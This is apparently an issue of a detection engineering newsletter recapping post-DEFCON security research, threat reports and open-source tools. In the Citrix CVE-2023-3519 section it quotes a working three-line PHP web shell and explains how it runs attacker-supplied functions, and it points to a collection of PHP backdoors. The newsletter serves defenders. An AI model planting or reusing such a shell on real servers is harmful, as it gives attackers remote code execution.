Detection Engineering Weekly #36 - I survived DEFCON
Though I did get interrogated by someone with a Tor badge
Welcome to Issue #36 of Detection Engineering Weekly!
I had an amazing time at hacker summer camp. Thank you to everyone who I connected with! I ran out of stickers in two days, saw several talks, played in a CTF, got product demos and swapped war stories at w00con. Lastly, I copped a Tor badge which had a small lie detector/polygraph hardware attached to it, and managed to “interrogate” a few people :D.
This week’s recap:
💎 by Tom Wolters on a Purple Team engagement where everyone wins
Lots of GitHub Hacking with two stories by mthcht and Daniel Grzelak
Anti-forensics script hunting with Philip Kettelson, back to basics with Goblin Loot and thinking with
portalstabular data with Amitai CohenQakbot updates by Team Cymru, Europol takes down a bullet proof hoster, Stairwell finds some shenanigans during the Citrix CVE exploitation window
Plus soo much more!
🫵 Hey you! Do you have a blog post, social link, or open-source tool you want to see in this newsletter?
Leave a comment below or email me techy@detectionengineering.net
💎 Detection Engineering Gem 💎
The Year Of The White Rabbit by Tom Wolters
This week's gem follows Wolters during a purple team engagement where they find a zero-day. A network switch exposed a PHP-based web application to manage the network device's configuration via the web. Wolters shares the methodology used during the engagement, which included recon on the web application, which turned out to be an open-source project.
They successfully exploited the application after some finagling of payloads, and the cool part here is that although the switch was pwned, the blue team caught post-exploitation activity! Turns out, writing detections across the "kill chain" helps bolster a defense-in-depth strategy. Who would've thought?!
State of the Art
How Threat Actors Use GitHub by mthcht
Like most cloud-hosting or SaaS apps (I'm looking at you, Discord), threat actors can abuse GitHub to do all kinds of funky things. In this post, mthcht highlights three scenarios that turn GitHub from a collaboration platform into attacker infrastructure. Luckily, mthcht provides Detection Opportunities for all scenarios!
Purple teaming — Understand Pivoting by Tho Le
This week has a ton of red team content! Maybe I'm feeling like switching to the dark side after DEFCON. In this post, Le assumes that the reader needs to gain more knowledge about pivoting in red-team engagement and takes everyone for a deep dive in all kinds of pivoting scenarios. They have a good lab setup and meticulously go through each step of each pivot scenario to showcase the power of pivoting. This shows how important practicing red-team techniques is for a detection engineer.
Hacking Github AWS integrations again by Daniel Grzelak
I've linked a few GitHub-AWS OIDC security posts on this newsletter, even from my own company, but this one has the best analogies and metaphors! Oh, also, a lot of fantastic technical content. If you are GitHub-OIDC-to-AWS curious, follow Grzelak along as they guide setting up a vulnerable implementation for testing, especially a vulnerable "racy randy role." I also learned that GitHub has an events API that anyone can subscribe to!
Snarkiness aside, I appreciate this quote toward the end of the post:
Please talk to your friends at Github and AWS. Similar to s3 buckets which were systemically mis-permissioned (sic) because of a variety of user inteface (sic) design flaws, this confused deputy issue is rampant and needs to be prevented systemically by default or somebody gonna get hurt real bad.
Brilliance in the Basics by Goblin Loot
No matter where you are in your security career, you must remember the basics. Security reminds me a lot of jiu-jitsu. With 100s of hours of mat time at this point, I find myself more interested in the basics of the sport rather than the advanced or sexy concepts. Goblin Loot does some security jiu-jitsu on you in the post, reminding us to keep it simple. My favorite recommendation: "If it's not for a human don't give it to a human."
Anti-forensics YARA rules by Phillip Kittelson
The author's first YARA rule is a banger! Kittelson found a post from SANS Internet Storm Center that reports on a malicious Python file that tries to perform anti-forensics operations before running. On Windows, threat actors can use several techniques to hide from dynamic and static analysis engines, and this cheeky sample detected Window names of common forensics tools and terminated them. They then created a high-fidelity rule to hunt for samples that use this technique, with much better results.
Tabular Thinking by Amitai Cohen
Are you familiar with high-school-level chemistry and vegetables? Cohen has a blog post using these two things to describe tabular thinking and how beneficial it is not just for security research but for almost any research. Cohen offers five "tabular mindset" axioms that I will steal (but credit) him on. However, think of tables as a structured representation of data modeling that you can add, remove, grow, and shape as you get more familiar with a problem space. And don't make fun of threat intel people who do everything in Excel. They are probably the most knowledgeable people about a subject that you know!
Detection Engineering on Social Media
Link: https://twitter.com/0x4d31/status/1691206826686029824
Link: https://twitter.com/HackingLZ/status/1690042780649762817
Link: https://twitter.com/jaimeblascob/status/1689694476770623491
Threat Landscape
Visualizing Qakbot Infrastructure: Uncharted Territory (part 2 of 2) by Team Cymru
Qakbot continues its campaign against literally everyone, and Team Cymru has an excellent analysis on updates to the malware family's C2 network. Some interesting new findings include: Qakbot operators love residential IPs for T2 connections, destination ports are not as random anymore, and the operators may take the summer off (maybe on the frontlines?).
5 arrested in Poland for running bulletproof hosting service for cybercrime gangs by Europol
I've always found bulletproof hosting services fascinating, especially when you are in a NATO country or a country with extradition. Like, what's the calculus behind some of these organizers who start one? Anyways, it's good to see Europol/US Departments working together to take down these hosters. It's not just cybercrime that bulletproof hosters engage in, but some other heinous things that make them (in my opinion) horrible, dangerous people.
CVE-2023-3519: Stairwell identifies previously unseen attack methods by Stairwell Threat Research
Stairwell identified post-compromise tooling by threat actors exploiting Citrix’s CVE-2023-3519. Two interesting things here. First, these web shells were not documented int he original CISA advisory about the vulnerability. Secondly, these shells are brilliantly simple, particularly the first one listed.
<?php http_response_code(404);
@$_POST['variable1']($_POST['variable2']);
?>
I’ve seen a few hax0r PHP shells in my day, but I tip my hat off to this one. Basically, the first POST request variable variable1
is loaded and used as a function call (think passing eval into this). The next variable, variable2
, is the argument to the function call. The @
in front is an error control operator, so that if the expression generates an error, it’s suppressed. Neat!
When a Zero Day and Access Keys Collide in the Cloud: Responding to the SugarCRM Zero-Day Vulnerability by Margaret Zimmerman
In this post, Zimmerman makes the case that you should do threat detection on your whole stack, not just the application. During this case walk-through, an attacker exploits CVE-2023-22952 to access cloud infrastructure and then uses that access to pivot to AWS via plain-text credentials left on the box. The best part? Detection Opportunities at the end!
Mac systems turned into proxy exit nodes by AdLoad by Fernando Martinez
Speaking of Qakbot's shenanigans with residential IPs, why not piggyback and buy access from devices that never get malware? That's right, MacOS, malware-free! PSYCHE (does saying this age me?), I'd be interested to see data that more serious malware uses proxyware and PitM infected devices for something more nefarious. AT&T did an excellent job of profiling AdLoader here and has seen 10,000 unique IPs a week reaching out as potential proxy exit nodes.
Discord.io confirms breach after hacker steals data of 760K users by Lawrence Abrams
The great thing about SaaS-based authentication? Integration with 3rd party providers! The bad thing about SaaS-based authentication? Integration with 3rd party providers! Especially if those 3rd party providers can't provide reasonable protection to their user bases, resulting in a breach of a service that definitely won't be used for doxxing or anything malicious. Turns out, Discord.io is one of these services, and an actor on an underground forum is selling the database to the highest bidder.
Open Source
shell-backdoor by beruangsalju
Pretty massive collection of PHP backdoors/shell backdoors. Maybe Stairwell can add their Citrix finding (it won’t look as nice as some of these, but probably won’t get caught as much as “1337 Hax0R SHELL by HACK3RMAN (shoutz HACKERCR3W")"
SWAT by elastic
The Elastic team released SWAT (Simple Workspace ATT&CK Tool) at DEFCON and I can’t wait to try it out! It’s a cloud threat emulation tool designed for Google Workspace. Definitely helpful for readers here that work in Google environments.
TTPForge by Facebook Incubator
Lots of threat emulation tools coming out from DEFCON, this time from Facebook/Meta. TTPForge is a CLI for TTPArmory that allows detection engineers to simulate attacks on AWS and Linux. Not as much coverage as other tools but good to see competition against AtomicRedTeam.
DFIQ by Google
DFIQ contains a list of DFIR Scenarios which contain several questions to ask when performing investigations. I like the grouping of tags, questions and some of them have approaches. It’s a neat codification of DFIR with a high level model to create repeatable playbooks for investigation.
RedWizard by SecuraBV
Automated red-team infrastructure builder with all kinds of OPSEC-safe techniques for different types of boxes. This tool may upset the camp of people who don’t want people to publish red team tools, but I love this stuff because it gives insight into how to build detections for techniques that threat actors likely used in the wild.